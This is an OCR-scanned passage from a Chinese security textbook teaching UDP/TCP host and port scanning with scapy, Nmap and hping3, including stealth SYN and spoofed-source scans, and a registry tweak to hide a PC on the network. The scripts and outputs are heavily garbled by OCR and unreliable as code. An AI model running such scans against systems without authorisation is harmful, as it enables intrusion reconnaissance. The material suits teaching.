dport= 6566 
len= 8 
chksun= 9x6182 


reserved= 0 
length= 0 
mexthopmtus 0 


侈 提示 : 如 果 目 标 主机 没有 开放 相应 的 端 
口 ， 会 返回 一 个 目标 不 可 达 消息 ， 但 是 也 
有 个 别 设备 不 会 响应 这 类 数据 包 ， 为 了 吉 
免 一 直 等 待 ， 可 以 加 入 超时 检测 指令 。 


使 用 一 条 命令 可 以 完成 UDP 扫 
描 ， 该 命令 为 sr1(IP(dst="192.168.1.103")/ 
UDP(dport=6666)).display()， 执 行 效果 如 下 
图 所 示 。 


==> SFITIPTG 
Begin emission: 
.Finished sending 1 packets. 


TZ- T6581 TJ/UDP(OPOTt=6666)] -arspUay() 


eceived 2 packets, got 1 answers, 
HW#[ IP ]### 


renaining 9 packets 
#4#[ IP in ICHP ]### 
version= 4 


chksum= Oxb505 
Src= 192.168.1.103 
92.168.1.101 
\options\ 

Hp#[ ICMP ]### 

type= dest-unreach 
code= port-unreachable 
chksum= 9xB133 
reserved= 9 

lenoth= 9 

nexthopmtu= 0 


\op 

#4#[ UDP in ICMP ]### 
sport= domain 
dport= 6666 
len= 8 
chksum= 9x6182 
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下 面 编辑 一 个 python 脚 本 实现 四 层 UDP 
自动 扫描 ， 具 体 代码 如 下 : 


#!/usr/bin/python 

import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

from scapy.all import * 

if len(sys.argv) !=2: 

print"Usage . ./UDP_SCAN.py 
network address]" 

print"Example . 
L921683Y: 1 

print "Example will perform a TCP 
ACK Ping scan of the 192.168.1.0/24 
range" 

sys.exit() 

address = str(sys.argv[1]) 

Dret 人 i -Uddress pit 
EOM addre ss mab 证 WE 
Lm dd 

for addr in range(1,254) : 

# 循 环 遍 历 整个 TP 地 址 段 

# 构 建 UDP 数 据 包 ， 设置 超时 时 间 ， 不 查看 错误 信息 

response = srl(IP(dst=prefix+str 
(addr) ) /UDP (dport=6666) ,timeout=0.1,verb 
ose=0) 
try: 
if int(response[IP] .proto) == 

#IP 的 上 层 协议 如 果 是 1 ( ICMP ) 认为 是 有 数据 返回 

print prefixtstr (addr) 

# 将 存活 主机 IP 地 址 打印 出 来 

except: 
pass 


10.4.3 ”工具 扫描 
使 用 Namp、hping3 等 工具 可 以 进行 四 日 
层 扫描 。 
1. Nmap 工 具 


Nmap 工 具 在 四 层 扫描 的 功能 还 是 非常 
强大 的 ， 使 用 的 具体 操作 步骤 如 下 : 


[/24 


./UDP_SCRN.pY 


step 国 使 用 Nmap 113.105.151.1-100 -PU666 
-Sn 命令 ， 可 以 实现 UDP 扫描 ， 执 行 效 果 如 
下 图 所 示 。 


Footerali: # nnap 192.168.1.1-106 -FU666 -sn 
Starting Nnap 7.76 ( https://nnap.org ) at 2918-19-26 63:51 EDT 


Nrap scan report for 192.168.1.1 
Host is up (6.09971s latency) 

hac Address: lc:Fa:68:61:2F:68 (Tp-Link Technologies) 

map scan report for 192.168.1.166 

Host is up (6.099185 latency) 

Mac address: 68:25:22:F9:5F:44 (ASRock Incarporation) 

nap done: 160 IP addresses (2 hosts up) scanned in 3.95 seconds 
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step 图 使 用 Nmap 192.168.1.1-100 -PA666 -sn 
命令 ， 可 以 实现 TCP 扫 描 ， 执 行 效果 如 下 图 
所 示 。 


Foot@kali: -~# nmap 192.168.1.1-160 -PA666 -Sn 

tarting Nmap 7.79 ( https://nnap.org ) at 2018-10-26 63:53 EDT 
map scan report for 192.168.1.1 

Host is up (6.99684s Latency1. 

IAC Address: 1C:FA:68:61:2F:98 (Tp-link Technologies) 

区 scan report for 192.168.1.100 

lo: 


st is up [9.09018s latency!. 
\C Address: 00:25:22:F9:5F:44 (ASRock Incorporation) 
map done: 199 IP addresses 12 hosts up) scanned in 2.35 seconds 


step 图 在 扫描 上 ，Nmap 不 局 限于 -PU 与 -PA 
两 个 参数 ， 还 有 其 他 参数 。 具 体 的 参数 信 
息 如 下 图 所 示 。 


FGST DTSCOVERTY 
-SL: List Scan - simply list targets to scan 
sn: Ping Scan - disable port scan 
-Pn: Treat all hosts as ontine -- 
PS/PA/PU/PY [portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
“PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
Pofprotocot list]: IP Prorocot ping 
“N/R: Never do DNS resolution/Always resolve [defautt: sometines] 
dns-servers <servll,serv2],...>: Specify custom DNS servers 
systen-dns; Use 05'5 DNS resolver 
traceroute: Trace hop pnth to each host 


skip host discovery 


侈 提示 : 当然 也 可 以 采用 地 址 列表 导入 
的 形式 进行 四 层 扫 描 ， 该 命令 为 Nmap - 谍 
addr.txt -PA80 -sn。 


2. hping3 工 具 


使 用 hping3 工 具 可 以 进行 四 层 扫描 ， 具 
体操 作 步 又 如 下 : 
step 加 使 用 hping3 192.168.1.103 --udp -c 1 命 
令 ， 可 以 对 该 地 址 实现 基于 UDP 的 扫描 ， 
执行 效果 如 下 图 所 示 。 


PooTORAUL HPPIng3 52 168. L103 --udp -eT 
HPING 192.168,1.103 (ethO 192.168.1.103): udp mode set, 28 headers + 0 data bytes| 
CNP Port Unreachable from ip=192.168.1,193 nane=UNKNOWN 

ktatus-6 port=1586 seq-9 


-192.168.1.193 hping statistic --- 
1 packets transmitted, 1 pacxets received，8% packet loss 
[round-trip min/avg/max = 29.7/29.7/29.7 ms 


下 面 给 出 一 段 基于 UDP 的 shell 脚 本 ， 
使 用 该 脚本 可 以 自动 进行 UDP 扫描 ， 具 体 
代码 如 下 : 


#!/bin/bash 
Tn TEhen 
echo "Usage - ./hping udp.sh [/24 
network address]" 


echo "Excample - ./hping udp.sh 
:A Ry 二 
echo "Example will perform a UDP 


Ping SWeep of the 192.168.1.0/24 network 
and output to an output.txt 五 le" 
exit 


184 


fi 
Prefixs$(echo SL | cut =d ~™ =E 1=3) 
# 去 除 IP 地 址 前 三 段 
for adqr in $(seq 1 200) ;do 
坦 使 用 循环 遍历 1-200 
hping3 $prefix.$addr --udp -c 1 >> 
Ir-txt  ## 将 结果 保存 到 =.txt 文 件 当中 
done 
# 使 用 grep 过 滤 出 存活 主机 的 TP 地址 ， 将 其 保存 
到 output .txt 文 件 中 
grep Unreachable ctxt | eat 一 Ga > 
FE Son de 2 >> O00tputst 
rm r.txt 间 删 除 临 时 文件 


[step 图 使 用 hping3 192.168.1.103 -c 1 命令 ， 
可 以 对 该 地 址 实现 基于 TCP 的 扫描 ， 执 行 效 
果 如 下 图 所 示 。 


ooorali se hpingy 192-168.1 703 -cI 
HPING 192.168.1,163 [ethB 192.168.1,163): NO FLAGS are set, 40 headers + 0 data bytes 
nr46 pm192. 168.1.193 tttr128 ldr178 sportrg flagsmRA seqr@ Win rttn7.8 ms 


192.168.1.103 hping statistic 
1 packets transnitted, 1 packers received, 0% packet loss 
ound-trip nin/ave/max = 7.8/7.8/7.8 ms 


下 面 给 出 一 段 基于 TCP 的 shell 肢 本， 使 
用 该 脚本 可 以 自动 进行 TCP 扫 描 ， 具 体 代码 
如 下 : 
#!/bin/bash 
1£ [ "S$#" =ne 1 17then 
echo "Usage - ./hping tcp.sh 
network address]" 
echo "Excample -一 
L92168= Ta” 
echo "Example will perform a TCP 
Ping SWeep of the 192.168.1.0/24 network 
and output to an output.txt file" 
exit 
ff 
prefix=$ (echo $1 | cut -d "." -f 1-3) 
# 去 除 IP 地 址 前 三 段 
for addr in $(seq 1 200);do 
# 使 用 循环 遍历 1-200 
hping3 $prefix.$addr -c 1 >> r.txt 
# 将 结果 保存 到 .txt 文件 当中 
done 
专利 选 出 以 len 开 头 的 字段 ， 并 保存 到 output . 
txt 文 件 中 


[/24 


./hping tcp.sh 


gre “Hern poixt euc 0 一 多 习 j 
cat =d = =F 2 > Ontpnute bet 
rm r.txt # 删 除 临 时 文件 


全 注意 : hping3 工 具 在 发 送 TCP 数 据 包 时 与 
其 他 工具 不 同 ， 它 发 送 的 TCP 数 据 包 flags 字 
段 全 部 都 是 0， 如 下 图 所 示 。 


CONETGT PTOEO5OT SG POTE 2552, Dst Port: 0, Seq: 1, Lens © 


在 扫描 完成 后 ， 如 果 主 机 存活 会 回复 
一 个 ACK+RST 的 数据 包 ， 回 复数 据 包 格式 
如 下 图 所 示 。 


ce Part: 日 


[Top Flags 


实战 演练 
实战 演练 1 一 一 查看 系统 中 的 ARP 缓 存 表 


在 利用 网 络 欺骗 攻击 的 过 程 中 ， 经 常 
到 的 一 种 欺骗 方式 是 ARP 欺 骗 ， 但 在 实 
施 ARP 欺 骗 之 前 ， 需 要 查看 ARP 缓 存 表 。 那 
么 如 何 查 看 系统 的 ARP 缓 存 表 信息 呢 ? 

具体 的 操作 步骤 如 下 : 
a 
菜单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 
行 ” 对 话 框 ; 在 “打开 ” od 
命令 ， 如 下 图 所 示 。 


10.5 


step 贺 单 去 “确定 ”按钮 ， 打 开 “ 命 令 提示 
符 ” 窗 口 ， 如 下 图 所 示 。 
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step 图 在 “命令 


提示 符 ” 窗 口中 输入 arp -a 


命令 ， 按 Enter 键 执行 命令 ， 即 可 显示 出 
本 机 系统 的 ARP 缓 存 表 中 的 内 容 ， 如 下 图 


所 示 。 


在 “命令 提示 符 ” 窗 口中 输入 arp -d 
命令 ， 按 Enter 键 执行 命令 ， 即 可 删除 ARP 
表 中 所 有 的 内 容 ， 如 下 图 所 示 。 


实战 演练 2 一 一 在 “网 络 邻居 ”中 隐藏 
自己 
如 果 不 想 让 别人 在 “网 络 邻居 ”中 看 


到 自己 的 计算 机 ， 则 可 把 自己 的 计算 机 名 
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称 在 “网 络 邻 居 ” 里 隐藏 ， 具 体 的 操作 步 
又 如 下 : 

[step 图 在 去 “开始 ”按钮 ， 在 弹出 的 快捷 
菜单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 
行 ” 对 话 框 ， 在 “打开 ”文本 框 中 输入 
Tegedit 命 令 ， 如 下 图 所 示 。 


加 运行 x 


Windows 将 根据 你 所 边 入 的 名 称 ,为 你 打开 相应 的 程序 
文件 夹 、 文 档 或 Internet 资源 。 


画 


打开 (O): |reged 放 v 


单 击 “ 确 定 ” 按 钮 打开“ 注册 表 编 
辑 器 ”窗口 ， 如 下 图 所 示 。 


取 清 浏览 (B)… 


图 注册 表 编 锅 器 - 0 x 
文件 (月 ” 妨 辑 (E) 查看 (V) 收藏 交 (A) 帮助 (H) 
> 国 计算 机 | 名 称 类 型 


a HKEY_CLASSES_ROOT 
同 HKEY_CURRENT_USER 
由 HKEY_LOCAL MACHINE 
四 HKEY_UsERS 

同 HKEY_CURRENT CONFIG 


计算 机 
step 国 在 “注册 表 编 辑 器 ”窗口 中 ， 展 开 分 
支 到 HKEY_ LOCAL MACHINE\SYSTEM\ 


CurrentControlSet\Services\LanManServer\ 
Parameters 选 项 下 ， 如 下 图 所 示 。 
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[step 轩 选中 Hidden 选 项 并 右 击 ， 从 弹出 的 快 
捷 菜 单 中 选择 “修改 ”菜单 项 ， 打 开 “ 编 
辑 字符 串 ” 对 话 框 ， 如 下 图 所 示 。 


绽 握 字符 圳 名 


数值 名 称 (N): 
[Hidden 


数 信 数 圭 (V): 
旧 


[step 图 在 “数值 数据 ”文本 框 中 将 dword 类 
键 值 从 0 设置 为 1， 如 下 图 所 示 。 


绽 志 字 符 率 x 


取消 


数值 名称 (N); 
| Hidden 


数值 数据 (V): 


[ 


EE 


单 击 “ 确 定 ”按钮 ， 就 可 以 在 “网 
络 邻 居 ” 中 隐藏 自己 的 计算 机 ， 如 下 图 


ll oesror psierse 


网 络 论 施 (1) 


国 = 本 
各 Windows10 tc 
二 软件 (0) 


> Wreless N Router TL-WRSeON 


10.6 ”小 试 身手 


练习 1: 认识 扫描 工具 Nmap。 

练习 2: 使 用 工具 进行 二 层 扫 描 。 
练习 3: 使 用 工具 进行 三 层 扫 描 。 
练习 4: 使 用 工具 进行 四 层 扫描 。 
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不 同 的 服务 通过 不 同 的 端口 提供 服务 ， 先 识别 主机 中 开放 了 哪些 端口 ， 再 根据 端口 确 
定 主机 开放 了 哪些 服务 。 本 章 介绍 如 何 对 无 线 网 络 中 的 存活 主机 进行 各 种 扫描 ， 主 要 包括 
扫描 UDP 端口 、 扫 描 TCP 端 口 、 扫 描 Banner 信 息 、 扫 描 SNMP 协 议 等 。 


11.1 扫描 主机 端口 


如 果 把 IP 地 址 比 作 一 间 房 子 ， 端 口 就 
是 出 入 这 间 房 子 的 门 。 真 正 的 房子 只 有 几 
个 门 ， 但 是 一 个 IP 地 址 的 端口 可 以 有 65536 
个 之 多 。 端 口 是 通过 端口 号 来 标记 的 ， 范 
围 是 从 0 到 65535。 每 一 个 端口 对 应 一 个 网 
络 应 用 或 应 用 端 程序 ， 因 此 ， 黑 客 通过 开 
放 的 端口 可 以 入 侵 系统 漏洞 ， 所 以 发 现 主 
机 开放 的 端口 就 变 得 尤为 重要 。 


11.1.1 扫描 UDP 端口 


扫描 UDP 端口 与 扫描 UDP 主机 是 不 同 
的 ， 虽 然 使 用 的 技术 相同 。 扫 描 UDP 端 口 
只 针对 目标 主机 不 响应 ， 以 此 判断 UDP 端 
口 打开 ， 而 对 于 有 响应 则 认定 是 没有 开放 
UDP 端口 。 


1. scapy 工 具 


使 用 scapy 编 写 python 脚 本 自动 化 端口 
扫描 程序 ， 具 体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
import time # 导 入 时 间 库 
import sys # 导 入 系统 库 
if len(sys.argv) !=4: 
## 如 果 输 入 的 参数 不 是 4, 做 出 提示 
print"Usage . ./udp_scan port.py 
[Target -IP] [Fiest Port][Last Port]" 
print"Example . ./udp_scan port 
L921681 1 1 TO00* 


print "Example will UDP port scan 
ports 1 through 100 on 192.168.1.1" 
SYS .exit() 
ip = sys.argv[1] # 取 出 参数 中 的 ITP 地 址 
portl = int(sys.argv[2]) 
# 取 出 参数 中 的 第 一 个 端口 号 
port2 = int(sys.argv[3]) 
# 取 出 参数 中 的 第 二 个 端口 号 
for port in range (portl,port2): 
# 以 给 定 端口 的 范围 进行 扫描 
# 构 建 UDP 数 据 包 进行 发 送 
a = srl(IP(dst=ip)/UDP (dport=port), 
timeout=0.1,verbose=0) 
time.sleep(1)# 延 时 1s 
if a==None: # 如 果 没 有 返回 数据 认为 端口 开放 
print port# 将 该 端口 打印 输出 
else: 2 
pass [Bi 


应 用 上 述 编码 ， 可 以 扫描 主机 开放 的 
端口 信息 。 


2. Nmap 工 具 


使 用 Nmap 工 具 可 以 扫描 UDP 端 
体操 作 步 又 如 下 : 
[step 图 使 用 Nmap -sU 192.168.1.103 命 令 ， 扫 
描 主 机 IP 地 址 为 192.168.1.103 的 端口 信息 ， 
执行 效果 如 下 图 所 示 。 如 果 没 有 指定 端口 
号 ， 默 认 情况 下 ，Nmap 会 扫描 常用 的 1000 
个 端口 号 。 


FFoot@kali:-# nmap -5U 192.168.1.103 

Starting Nnap 7.79 ( https://nmap.org ) at 2918-19-26 94:07 EDT 

Nmap scan report for 192.168.1.193 

Host is up (6.9936s latency) 

Not shown: 992 closed ports 
SERVICE 

hz3/udp open ntp 

ha7/udp open 

hs/udp open|filtered netbios-dgn 

445/udp open|filtered microsoft-ds 

5ee/udp open|filtered isakmp 

he2s/udp open|filtered blackjack 

19eeyudp open|filtered upnp 

45eeyudp open|filtered nat-t-il 

MAC Address: 98:6C:29:A2:4E: 2 人 wware) 


， 具 


Nmap done: 1 IP address (1 host up) scanned in 1.49 secords 
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[step 图 指定 端口 进行 扫描 ， 使 用 Nmap -sU 
192.168.1.103 -p 123 命 令 。 如 果 端 口 开 放 ， 
执行 效果 如 下 图 所 示 。 

Foot@kali:-# nmap -sU 192.168.1.163 -p 123 

tarting Nmap 7.79 ( https://nmap.org ) at 2918-10-26 94:13 EDT 
map scan report for 192.168.1.193 

PoRT STATE SERVICE 

123/udp open ntp 

MAC Address: 00:0C:29:A2:4E:07 (VMware) 


map done: 1 IP address (1 host up) scanned in 9.22 seconds 


[step 图 使 用 Nmap -sU 192.168.1.103 -p 888 命 
令 ， 如 果 端 口 不 开放 ， 执 行 效果 如 下 图 所 
示 。 如 果 需 要 扫描 多 个 端口 使 用 “-” 进 行 
分 割 ， 如 -p 1-65535， 进 行 全 端口 扫描 。 

arting Wap 7 yo «https! /imap org ) at 2018.19.26 04:15 ED1| 


map scan report for 192.168.1.103 
ost is up (9.06948s5 latency!. 


ORT 。 STATE ”SERVICE 
88/udp closed accessbuilder 
IAC Address: 99:9C:29:A2:4E:97 (VMware) 


map done: 1 IP address (1 host up) scanned in 0.22 seconds 


侈 提示 : Nmap 还 支持 从 文件 中 读 取 地 址 列 
表 进 行 端口 扫描 ， 使 用 的 命令 为 Nmap - 谍 
addr.txt -SU -p 1-333。 


ii 11.1.2 ”扫描 TCP 端 口 


扫描 TCP 端 口 要 比 扫描 UDP 主机 复杂 ， 


” 它 是 基于 TCP 连 接 协 议 的 扫描 ， 其 中 包括 


隐蔽 扫描 、 全 连接 扫描 、 中 间 人 扫描 ， 这 
些 众多 扫描 方式 都 是 基于 三 次 握手 的 变化 
来 完成 的 。 


1. 隐蔽 扫描 


隐蔽 扫描 主要 是 通过 向 目标 主机 特定 
端口 发 送 SYN 包 。 如 果 目 标 主机 回复 RST 数 
据 包 ， 隐 项 扫描 则 根据 回复 数据 包 ， 来 判 
断 主机 端口 是 否 开放 ， 由 于 没有 建立 完整 
连接 ， 所 以 应 用 日 志 不 记录 扫描 行为 ， 从 
而 达到 一 定 程度 的 隐蔽 。 

(1) scapy 工 具 。 使 用 scapy 实 施 隐 
蔽 扫描 ， 使 用 a=srl(P(dst="192.168.1.1")/ 
TCP(flags='S'), timeout=1) 命令 ， 给 目标 主 
机 发 送 SYN 包 ， 目标 主机 回复 SYN/ACK 
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数据 包 ， 使 用 wirshark 抓 包 可 以 看 到 除 此 
之 外 还 多 出 一 个 RST 数据 包 ， 这 是 由 于 操 
作 系 统 不 知道 SYN 包 的 发 送 ， 因 此 当 目 标 
主机 发 送 SYN/ACK 时 便 自动 回复 RST 数 
据 包 ， 执 行 效果 如 下 图 所 示 。 


[一 


IC 
4 26 ~ BH [SYN] SIEB WiTE8192 LE 


这 里 给 出 一 段 python 脚 本 实现 TCP 自 动 
扫描 的 代码 ， 具 体 代 码 如 下 : 


#!/usr/bin/python 


import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
import sys 
if lenl(sys.argv) !=4: 
# 如 果 输 入 参数 不 是 4, 做 出 提示 
print"Usage . ./syn scan.py [Target 
-IP] [First Port] [Last Port]" 
print"Example -VYn can 
192- L685 T=1 TL LO 
print "Example will TCP SYN scan port 
scan ports 1 through 100 on 192.168.1.1" 
sys.exit() 
ip = sys.argv[1]# 获 取 IP 地 址 
portl = int(sys.argv[2])# 获 取 起 始 端口 
port2 = int(sys.argv[3])# 获 取 结 束 端口 
for port in range (Portl,Port2) : 
# 循 环 遍历 端口 区 段 
# 构 造 TCP 数 据 包 并 发 送 
a = srll(IP(dst=ip)/TCP (dport=port), 
timeout=0.1,verbose=0) 
if a==None: 。 # 如 果 数 据 为 空 不 做 处 理 
pass 
else: 
if int(a[TCP] .fags==18) : 
# 判 断 返 回 数据 包 TCP 标 记 为 18, 即 SYN/ACK 
print port  ## 打 印 出 端口 
else: 
pass 


(2) Nmap 工具 。 使 用 Nmap 扫描 相对 
比较 简单 ， 直 接 使 用 工具 ， 然 后 添加 响应 
的 参数 ， 即 可 完成 扫描 。 具 体 的 方法 为 : 
使 用 Nmap 192.168.1.103 -p 1-200 命 令 扫 
描 ， 默 认 情 况 下 ，Nmap 工具 使 用 SYN 方 
式 来 扫描 端口 。 扫 描 结 果 如 下 图 所 示 。 


DOTORATI: 7 TEST ori nmap TI97-T68-T-T93 -p 1-295 
var tng; rep Tare (itpss /Tomab:0rD. Yat 606-2920 05:37 Em| 
map scan report for 192.168.1.16: 

lost is up (9.09033s latency|. 

lot shown: 198 closed ports 


ORT STATE SERVICE 
35/tcp open msrpc 
39/tcp open netbios-ssn 
C Address: 99:6C:29:A2:4E:67 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds | 


另外 ， 可 以 使 用 Nmap -sS 192.168.1. 
103 -p 1-200 命 令 ， 指 定 使 用 SYN 包 的 方式 
进行 扫描 ， 其 扫描 结果 是 一 样 的 。 还 可 以 
使 用 Nmap -sS 192.168.1.103 -p 1-65535 或 
Nmap -sS 192.168.1.103 -p- 命 令 ， 实 现 全 端 
口 扫 描 。 
侈 提示 : 如 果 目 标 主机 被 防火 墙 过 滤 ， 
可 能 会 有 一 些 非 open 状 态 的 端口 被 显示 ， 
此 时 可 以 通过 加 入 --open 进 行 过 滤 ， 只 显 
示 open 状 态 的 端口 。 如 果 有 多 个 不 连续 的 
端口 可 以 使 用 “，” 进 行 分 隔 ， 如 “80， 
85，135” 这 样 。 

(3)hping3 工具 。 使 用 hping3 192.168.1. 
103 --scan 100-200 -S 命令 ， 实 现 对 100 一 200 
端口 扫描 ， 使 用 SYN 人 hping3 显 


示 出 来 的 结果 条 例 更 清晰 一 些 。 类 似 表格 
的 形式 如 下 图 所 示 。 
oot@Kali: ~/Test/port# hpingy 192.168.1.103 --scan 196-265 -5 


canning 192.168.1.193 (192.168.1.193), port 190-269 
81 ports to scan, use -V to see all the replies 


| win 1 ten | 
---+-----+-----+ 
“135 loc.srv 128 14087 16616 "46 
139 netbios-ssn: .5..A... 128 15111 16616 46 
1 replies received. Done. 
ot responding ports: 


另外 ， 使 用 hping3 -c 200 -S --spoof 
192.168.1.155 -p ++1 192.168.1.103 命 令 ， 实 
现 欺骗 扫描 。 

从 1 这 个 端口 开始 扫描 ， 每 次 端口 
加 1 总 共 发 送 200 个 数据 包 ， 伪 造 地 址 
“192.168.1.155”， 要 扫描 的 目标 地 址 为 
“192.168.1.103”， 这 样 做 的 优点 是 隐 
蔽 ， 缺 点 是 本 机 无 法 查看 到 结果 ， 可 以 
通过 交换 机 镜像 端口 ， 或 者 是 有 权 查 看 
192.168.1.155 才 可 以 。 


2. 全 连接 扫描 
直接 与 目标 主机 建立 三 次 握手 ， 如 果 
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能 够 建立 三 次 握手 证 明 主 机 端口 开放 。 全 
连接 扫描 的 优点 是 结果 准确 ， 缺 点 是 完 
暴露 没有 隐蔽 。 

(1) scapy 工 具 。 直 接 使 用 脚本 建立 三 
次 握手 ， 具 体 代 码 如 下 : 


#!/usr/bin/python 

import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

from scapy.all import * 

# 发 送 SYN 包 

response = srl(IP(dst="192.168.1.1") 
/TCP (dport=80, flags="'S')) 

# 第 二 次 发 送 使 用 目标 主机 返回 的 seq 值 将 其 +1 处 
理 ， 这 样 构成 一 个 完整 通信 

reply = srll(IP(dst="192.168.1.1")/ 
TCP (dport= 80,flags='A',ack=(response 
[TCP] .seq+1))) 


提出 猜想 ， 之 前 通过 发 送 数 据 包 了 解 
到 ， 系 统 会 自动 回复 RST 包 ， 修 改 脚本 验证 
猜想 ， 使 得 发 送 数据 显示 出 来 。 修 改 后 的 
代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
# 构 造 SYN 包 
SYN= TIPUlAdste- "L192. 68. 1 
TCP (dprot=80, flags='S"') 
print "== SENE ==0 
# 在 终端 打印 出 一 个 发 送 标记 
SYN.display () # 在 终端 显示 数据 包 内 容 
print"\n\n-- RECEIVED =-" 
# 在 终端 打印 发 送 结束 标记 
response = srl(SYN,timeout=1, 
verbose=0)  # 将 构造 好 的 SYN 包 发 送出 去 
response.display () 
# 在 终端 打印 返回 的 数据 包 
if int(response[TCP] .flags)==18: 
得 判断 回复 的 是 否 为 SYN/RCK 
Trilne NO 风光 
# 再 次 打印 发 送 标记 
# 构 造 返回 包 
A = IP(dst="192.168.1.1")/TCP (dport= 
80,flags='A',ack= (response [TCP] .seql+1)) 
A.display () # 展 现 构造 好 的 数据 包 


a 
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print"\n\n-- RECEIVED --"# 打 印 结束 标 记 
response2=srl (A,timeout=1,verbo 
# 将 构造 好 的 数据 包 发 送 
response2.display()# 在 终端 打印 返回 数据 包 
BLSes 
print"SYN-ACK not returned 
# 如 果 端 口 不 开放 ,打印 提示 


使 用 上 述 代码 进行 扫描 的 操作 步骤 
如 下 : 
Estee 加 发 送 第 一 个 SYN 数 据 包 ， 如 下 图 


se=0) 


所 示 。 

= SENT -- 

EE[ IP ]### 关 ##[ TCP ]### 
version =4 sport = ftp_data 
ihl = None dport 
tos = 9x9 seq 
len = None ack 
id =1 dataofs 
flags = reserved 
frag =0 flags 
ttl = 64 window 
proto = tcp chksum 
chksum = None urgptr 
src = 192.168.1.161 options = 
dst = 192.168.1.1 


Noptions \ ~ RECEIVED - 


step 园 这 时 会 返回 SYN/ACK 数 据 包 内 容 ， 
如 下 图 所 示 。 


Lid HAT TCP 天 天 


version =4 sport 

inht = 5 dport 

tos exg seq 

len 44 ack 

id 39495 dataofs = 

flags DF reserved = 

frag 9 flags = 

ttl 64 window = 16384 

proto tcp chksum = 9x7202 
chksum Oxlcce urgptr =0 

src 192.168.1.1 options = [('MsS', 1469)] 
dst = 192.168.1.101 ###[ Padding ]### 

\options \ load = '\xe0\x90" 


step 图 此 时 满足 条 件 ， 因 此 构建 第 二 个 ACK 
数据 包 ， 如 下 图 所 示 。 


Bs#[ IP ]### 有 [TCF ]### 
version = 4 sport = http 
iht 5 dport = ftp_data 
tos exe seq = 3865475985 
len 49 ack =0 
id 39496 dataofs =5 
flags reserved =0 
frag 9 flags =R 
ttl 64 window =0 
proto tcp chksum = 9xc9cd 
chksum ex5cd1 urgptr = 9 
src 192.168.1.1 options = [] 
dst = 192.168.1.161 ###[ Padding ]### 
\options \ load = '\x90\x90\x90\x90\x00\x99 


Estee 图 使 用 Wirshark 抓 包工 具 抓 取 通信 过 
程 ， 再 次 验证 猜想 ， 可 以 发 现 有 5 个 数据 
包 ， 主 机 发 送 SYN 数 据 包 ， 目 标 主机 回复 
SYN/ACK 数 据 包 ， 操 作 系 统 回 复 RST 数 
据 包 ， 此 时 已 经 中 断 连接 ， 主 机 再 次 发 送 


ACK 数 据 包 ， 目 标 主 机 回复 RST 数 据 包 ， 
整个 通信 过 程 如 下 图 所 示 。 


TCWC 


使 用 iptables -A OUTPUT -p tcp --tcp- 
flags RST RST -d 192.168.1.1 jj DROP 命 令 ， 
系统 自 带 防火 墙 设置 过 滤 ， 但 不 自动 发 送 
RST 数 据 包 。 使 用 iptables - 工 命令 ， 检 查 防 
火 墙 规 则 是 否 生效 ， 如 下 图 所 示 。 


FeataRaUISCTTSSUPorGrIPEa6UeS -TC 


Ehain INPUT (policy ACCEPT) 

Karget prot opt source destination 

Ehain FORWARD (policy ACCEPT) 

Karget prot opt source destination 

Ehain OUTPUT (policy ACCEPT) 

Karget prot opt source destination 

brop tep anywhere _gateway tcp flags:RST/RS 


[step 园 再 次 运行 脚本 ， 查 看 最 后 一 次 返回 数 
据 ， 如 下 图 所 示 。 由 此 看 来 三 次 握手 正常 


-= SENT -= 
4#[ IP ] i 同和 PT TEP 和 
version = sport = ftp_data version =4 sport = http 
ihl one dport = http inht = 5 dport ftp_data 
tos X9 Seq i tos = 9x9 seq 895120079 
len one ack = 3865475985 len = 49 ack 2 
id dataofs = None id = 49589 dataofs 5 
有 reserved = 9 flags = DF reserved =0 
frag = 9 flags A 
frag flags A 
0 ttl = 64 window 16384 
ttl 汪 proto = tcp chksum Ox936c 
proto Sug, J Nena chksum = 9x1895 urgptr 9 
chksum urgptr = 0 src = 192.168.1.1 options = [] 
src 92.168.1.101 options = [] dst = 192.168.1.191 ###[ Padding ]### 
dst = 192.168.1.1 -- RECEIVED -- options load = '\x00\x00\x00\x90\x00\x00 
\options \ 


Ee 加 构建 完成 后 ， 返 回 的 数据 包 如 下 图 
所 示 。 
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step 较 通过 Wirshark 抓 包工 具 抓 取 通信 过 
程 ， 如 下 图 所 示 。 


54 29 ~ 86 [SYN] Seq-® Win-8192 Lenz8 
59 58 ~ 20 [57N, ACK] Seq® Ack=1 Win=16384 Len=8 M55=1400 


(2) Nmap 工具 。Nmap 工具 本 身 自 带 
了 全 连接 扫描 功能 ， 用 户 使 用 简单 的 命令 
配置 即 可 完成 TCP 端口 扫描 ， 具 体 的 操作 
步骤 如 下 : 
[sep 回 使 用 Nmap -sT 192.168.1.103 -p 135 命 
令 ， 对 主机 特定 端口 实施 全 连接 扫描 ， 如 
下 图 所 示 。 


FootGRaUII- nmap -sT 192. 168.1.103 -p 
Starting Nmap 7.79 ( https://nmap.org ) at 2018-10-26 22:23 EDT 
map scan report for 192.168,1.193 

host is up (6.69935s Latencyl. 


ORT STATE SERVICE 
135/tcp open msrpc 
MAC Address: 90:0C:29:A2:4E:07 (VMware) 


map done: 1 IP address (1 host up) scanned in 6.14 seconds 


step 园 使 用 Nmap -sT 192.168.1.103 -p 1-200 
命令 ， 可 以 对 区 间 的 端口 进行 扫描 ， 如 下 
图 所 示 。 


ey # nmap -sT 192.168.1.103 -p 1-266 


tarting Nmap 7.79 ( https://nmap.org ) at 2918-19-26 22:29 EDT 
map scan report for 192.168.1.193 

ost 1s up (6.99195 latency) 

jot shown; 198 closed ports 

ORT STATE SERVICE 

35/tcp open msrpc 

ha9/tcp open netbios-ssn 

IAC Address: 90:0C:29:A2:4E:07 (VMware) 


map done: 1 IP address (1 host up) scanned in 6.17 seconds 


step 图 使 用 Nmap -sT 192.168.1.103 -p 
135,445,555 命 令 ， 对 一 组 端口 进行 扫描 ， 
